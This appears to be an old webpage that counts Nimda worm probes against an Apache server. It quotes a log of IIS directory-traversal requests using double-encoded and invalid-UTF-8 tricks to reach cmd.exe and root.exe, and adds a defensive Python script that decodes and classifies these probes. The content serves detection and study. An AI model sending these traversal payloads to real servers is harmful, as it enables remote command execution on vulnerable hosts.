The New and Improved Code Red ... NIMDA

This webserver has been attacked by Nimda Times

The number is the output of:

grep -c "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir" /usr/local/apache/logs/access_log

The attack string is received as a web server request, thusly:

xx.xx.xx.xx- - [18/Sep/2001:23:00:45 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:45 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:46 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:46 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:47 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:47 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:48 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:48 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:49 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:49 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:50 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:50 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:50 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:51 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:51 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:52 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"

Here xx.xx.xx.xx is the address of the poor winloser. As this opens a bunch of remote holes, I've substituted xx's for his protection.
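
The grep above matches only the /_vti_bin/ request of each sweep. As an added example (not part of the original page), the following Python percent-decodes every request target until it stops changing, then counts probes per client by the encoding trick used. The function names, labels and sample log lines are this example's own, and the sample uses documentation addresses rather than real ones.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_to_bytes

# Added example: names and sample lines are constructed (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = r'''
192.0.2.10 - - [18/Sep/2001:23:00:45 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
192.0.2.10 - - [18/Sep/2001:23:00:47 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
192.0.2.10 - - [18/Sep/2001:23:00:50 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
192.0.2.10 - - [18/Sep/2001:23:00:50 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
192.0.2.77 - - [18/Sep/2001:23:01:02 -0700] "GET /docs/100%25-free.html HTTP/1.0" 200 1024 "-" "-"
'''

REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/')  # client, request target
TARGETS = (b"cmd.exe", b"root.exe")  # executables requested in the log above

def full_decode(target: bytes, max_rounds: int = 5):
    """Percent-decode until the value stops changing; return (bytes, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(target)
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target, rounds

def classify(target: str):
    """Return a label for a Nimda-style probe, or None for any other request."""
    decoded, rounds = full_decode(target.encode("utf-8"))
    if not any(t in decoded.lower() for t in TARGETS):
        return None
    if rounds >= 2:  # e.g. %255c -> %5c -> backslash
        return "multiply-encoded"
    if b"\xc0" in decoded or b"\xc1" in decoded:  # bytes that never occur in valid UTF-8
        return "invalid-utf8"
    return "plain"

def summarize(log_text: str):
    """Map each client to a count of probe labels seen from it."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        label = classify(m.group(2)) if m else None
        if label:
            hits[m.group(1)][label] += 1
    return {client: dict(counts) for client, counts in hits.items()}

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

In the log lines shown above, the client field reads "xx.xx.xx.xx-" because of the substitution, so it is reported with the trailing dash.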

This machine Microsoft Free